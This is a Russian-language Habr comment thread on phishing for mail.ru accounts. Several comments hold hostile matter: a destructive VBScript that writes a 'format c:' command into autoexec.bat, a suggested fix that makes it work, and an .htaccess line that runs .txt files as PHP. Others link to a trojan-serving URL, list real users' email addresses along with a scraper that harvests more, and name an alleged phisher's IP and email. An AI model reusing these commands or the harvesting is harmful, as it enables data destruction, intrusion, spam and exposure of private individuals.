Comments 69
Довольно интересно.
0
бороться с этим — как приколачивать желе гвоздями к дереву
+30
Скройте список адресов, пожалуйста. Или вы хотите пополнить ими спам-листы?
-9
А в mail.ru не написали?
-1
А смысл? тут нет уязвимостей мейл.ру(ну кроме открытого редиректа на otvet.mail.ru, но это мелочь), пользователи сами отдают свои пароли, им и надо быть внимательнее.
Отписал пользователям с линком на заметку, но не думаю, что это вылечит их от невнимательности.
Отписал пользователям с линком на заметку, но не думаю, что это вылечит их от невнимательности.
0
У меня есть подозрение, что там должны быть заинтересованы в пресечении таких выкрутасов не меньше вашего.
0
Читали уже про их пресечения в ICQ, не надо нам таких :)
+4
Вы совершенно правы, мы (Mail.Ru) очень заинтересованы в борьбе с фишингом. И не просто заинтерсованы, мы ежедневно (в сотрудничестве с хостерами) закрываем фишинговые сайты (иногда — пачками). Хотя коммент выше про «желе гвоздями к дереву» весьма точно описывает ситуацию в целом.
Но в любом случае — если замечаете фишинг или просто что-то подозрительное, пишите на abuse@corp.mail.ru, мы разберемся. Спасибо.
Но в любом случае — если замечаете фишинг или просто что-то подозрительное, пишите на abuse@corp.mail.ru, мы разберемся. Спасибо.
+6
Обычный СИ. Всегда был и всегда будет.
+5
Мне вчера пришло на gmail, причем не в спам и без пометок:
"Happy New Year to all Gmail Users.we will be upgrading our database for the coming year 2012.Kindly reply to this message by typing «TEAM» to receive the update link for your account."
Т.е. еще и запросите у нас сами фишинговую ссыль…
Письмо конечно сразу ушло в фишинг репорт и сейчас уже помечается красным.
"Happy New Year to all Gmail Users.we will be upgrading our database for the coming year 2012.Kindly reply to this message by typing «TEAM» to receive the update link for your account."
Т.е. еще и запросите у нас сами фишинговую ссыль…
Письмо конечно сразу ушло в фишинг репорт и сейчас уже помечается красным.
+2
Фишинг как фишинг. Только текст письма оригинален. Не ново.
+2
По ходу дела, у кого нет антивируса не суйтесь на этот линк URL: newamn.h18.ru/log.txt там раздают вот этот троян (bv:KillAll-A [Trj]) бесплатно.
+3
FAIL какойто
0
Парсер парсер
script language ="VBScript"
sub Reboot 'Процедурка перезагрузки
Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows" 'Вызов WinApi с помощью
RunDll
end sub
sub destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if fs.fileexists("c:\autoexec.bat") then 'Если у нас Autoexec существует
set ab=fs.getfile("c:\autoexec.bat") 'Возмём его
ab.attributes=0 'И поставим "нормальные" аттрибуты))
end if
set autoexec=fs.CreateTextFile("c:\autoexec.bat")'Пересоздадим Autoexec
'Далее запишем в него полезные комманды, их там явно не хватает!)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close 'Закроем Autoexec.bat
end sub
destruct 'Запишем в Autoexec комманду format
reboot
0
Рекомендую в дальнейшем на Хабрахабре использовать пару тегов <source>…</source> для обрамления ими исходного кода.
+7
Это не вирус, это магическое заклинание скрипт-кидди, которое по их мнению убивает систему и передается из поколения в поколение. Оно не сработает ни в одной системе начиная с Windows NT. Причем в Windows 95/98 оно тоже не сработает, потому как
echo Y | format C: /q
они сделать не догадались.
echo Y | format C: /q
они сделать не догадались.
+3
У меня нет антивируса, но есть noscript, и вообще стоит линукс. Можно я сунусь?
-10
Расскажите нам пожалуйста еще что-нибудь о себе.
+15
Брат живой!
-1
Замечательно, меня заминусовали хабраюзеры, которые боятся заразиться текстовым файлом. Еще и нагадили в то, что нельзя называть, с вашей легкой подачи. Можете собой гордиться.
+1
В топике не хватает ссылки на исходник скрипта. Вот:
pastebin.com/01bf9ar8
pastebin.com/01bf9ar8
0
$_POST['tipe'] :)
+6
$_POST['tipe'] :)
+4
Занятная проблема… А существуют ли какие-то надёжные её решения? (Факт существования цифровых подписей — это ещё не решение, по-моему.)
0
Мылору и без фишинга дырявое как дуршлаг. Лучше юзать яндекс или гугол.
-9
А Вы лично этот «дуршлаг» видели? Или начитались умных дяденек? Конкретней, пожалуйста.
+3
Не хочу защищать мылру, но… При мне коллега находил отличную XSS на яндексе. Так что чуть лучшая репутация перечисленных вами компаний — отнюдь не гарантия защиты. Лучше тогда вообще ничего не пользовать :)
+2
В образовательных целях. Строка «Гугл дал исходники этого скрипта» — как это было сделано? Т.е. можно выкачивать чужие скрипты?
+2
Ага, и еще в файле логов плохие вещи.
Так, что лучше быть аккуратным.
Так, что лучше быть аккуратным.
-5
Вы текстовым файлом хотите заразиться? Касперский ругается только потому, что в файле есть прямые ссылки на трояны, а Опера и не собирается их скачивать.
+4
Не так давно слышал от чувака «ну ты типа как через картинку-то заразишься»? А оказалось — оверфлоу, все дела…
+1
А вот я про это и говорю, txt файл может быть совсем не .txt. Простой пример:
В .htaccess
В log.txt
Так, что HeadFore Вы не правы, и не нужно минусовать…
В .htaccess
AddHandler application/x-httpd-php .php .txt .jpg
В log.txt
<?php
echo <<<LOG
blabla
blabla
LOG;
//А дальше код связки
Так, что HeadFore Вы не правы, и не нужно минусовать…
+3
бы в шапках письма я не нашел хост и скрипт, с которого велась рассылка
Стоило бы выложить скриншот хедеров для наглядности.
Хост, я так понимаю, был найден в Received?
А скрипт как нашли?
0
А список емейлов вы опубликовали для того чтобы обрадовать их владельцев свеженькой лавиной спама? Хотя бы картинкой вставили.
-6
Список емейлов опубликовал для того, чтобы «жертвы» нашли заметку по поиску и намотали на ус.
Я не думаю, что в 2011 году скрытие емейла является действенным способом уберечься от спама — современная почтовая система должна уметь справляться со спамом.
При этом адреса пользователей не являются секретом на сервисах mail.ru — взглянем например на «мир» первого попавшегося пользователя, которого я нашел в гугле
адрес его «мира» — my.mail.ru/mail/cjroqa/
соответственно почтовый ящик — cjroqa@mail.ru
У него в друзьях:
my.mail.ru/inbox/privet2003/ — privet2003@inbox.ru
my.mail.ru/bk/vrshu/ — vrshu@mail.ru
my.mail.ru/mail/sfm61/ — sfm61@mail.ru
my.mail.ru/mail/342625/ — 342625@mail.ru
my.mail.ru/mail/rubicon78/ — rubicon78@mail.ru
my.mail.ru/mail/susoenio/ — susoenio@mail.ru
Так в чем же соль скрытия почтового ящика в посте на хабре?
Если спамерам надо, они возьмут эту информацию открыто с сервисов mail.ru и «добрые самаритяне» типо меня им нафик не нужны.
Я не думаю, что в 2011 году скрытие емейла является действенным способом уберечься от спама — современная почтовая система должна уметь справляться со спамом.
При этом адреса пользователей не являются секретом на сервисах mail.ru — взглянем например на «мир» первого попавшегося пользователя, которого я нашел в гугле
адрес его «мира» — my.mail.ru/mail/cjroqa/
соответственно почтовый ящик — cjroqa@mail.ru
У него в друзьях:
my.mail.ru/inbox/privet2003/ — privet2003@inbox.ru
my.mail.ru/bk/vrshu/ — vrshu@mail.ru
my.mail.ru/mail/sfm61/ — sfm61@mail.ru
my.mail.ru/mail/342625/ — 342625@mail.ru
my.mail.ru/mail/rubicon78/ — rubicon78@mail.ru
my.mail.ru/mail/susoenio/ — susoenio@mail.ru
Так в чем же соль скрытия почтового ящика в посте на хабре?
Если спамерам надо, они возьмут эту информацию открыто с сервисов mail.ru и «добрые самаритяне» типо меня им нафик не нужны.
+9
А ещё больше мыл круче на сайте otvet.mail.ru
Берем первую попавшуюся тему — otvet.mail.ru/question/598824
Грепаем на <span id="online:
получаем:
Берем первую попавшуюся тему — otvet.mail.ru/question/598824
Грепаем на <span id="online:
$html = file_get_contents("http://otvet.mail.ru/question/598824");
if(preg_match_all("/<span\s+id\=\"online\:(.*)\"/isU", $html, $matches))
{
print_r($matches[1]);
}
получаем:
[0] => vena1408@bk.ru
[1] => alesenok@mail.ru
[2] => olga_buzova@list.ru
[3] => usr-7145801a1c45b4e2840fe358a665bb34@nobody.mail.ru
[4] => usr-2e21e36d35a7ff50f0e68fe1ee33aad5@nobody.mail.ru
[5] => usr-a8c1bb6f07938b0020a02cf346ebb9e6@nobody.mail.ru
[6] => notichka@mail.ru
[7] => m-3-a-i-a@mail.ru
[8] => usr-7460bfe1590febfa229dbbf05df7a03a@nobody.mail.ru
[9] => m-radio71-3@mail.ru
0
IP резолвится как 78-36-109-183.static.komi.dslavangard.ru
80 порт открыт наружу.
Так что похоже, что у него стачитеский IP, так что проблем выяснения личности не будет.
Если найдётся время, было бы хорошо отписать провайдеру.
80 порт открыт наружу.
Так что похоже, что у него стачитеский IP, так что проблем выяснения личности не будет.
Если найдётся время, было бы хорошо отписать провайдеру.
+3
newamn.h18.ru/log.txt
Отправелено сообщение &Привет Эля! я тут просто пробую своё детище как оно работает! посмотри внимание на мыло отправителя!
2
мой настоящий е-мали
oooo2009oooo@mail.ru
+3
Быть может, эту статью правильнее назвать «Как получают доступ к чужим ящикам»?
-1
В gmail на такой случай есть хорошая штука — подтверждение по sms.
Было бы не плохо если mail.ru сделали подобное, да и не только mail.ru.
Было бы не плохо если mail.ru сделали подобное, да и не только mail.ru.
0
>детали письма скрыты для того, чтобы злоумышленник не стал преследовать знакомого
Можно подумать, что злоумышленник — маньяк-убийца и у него в заложниках находятся близкие вашего знакомого. Не бойтесь открыто проучить эту школоту.
Можно подумать, что злоумышленник — маньяк-убийца и у него в заложниках находятся близкие вашего знакомого. Не бойтесь открыто проучить эту школоту.
+3
Мне недавно подобная фигня на яндекс приходила. Особенно порадовала куча адресов в поле копий. Отписал в саппорт (реальный).
+3
А я думал, что фишингу уже сто лет исполнилось…
+1
Sign up to leave a comment.
Как получают доступ к чужим ящикам на mail.ru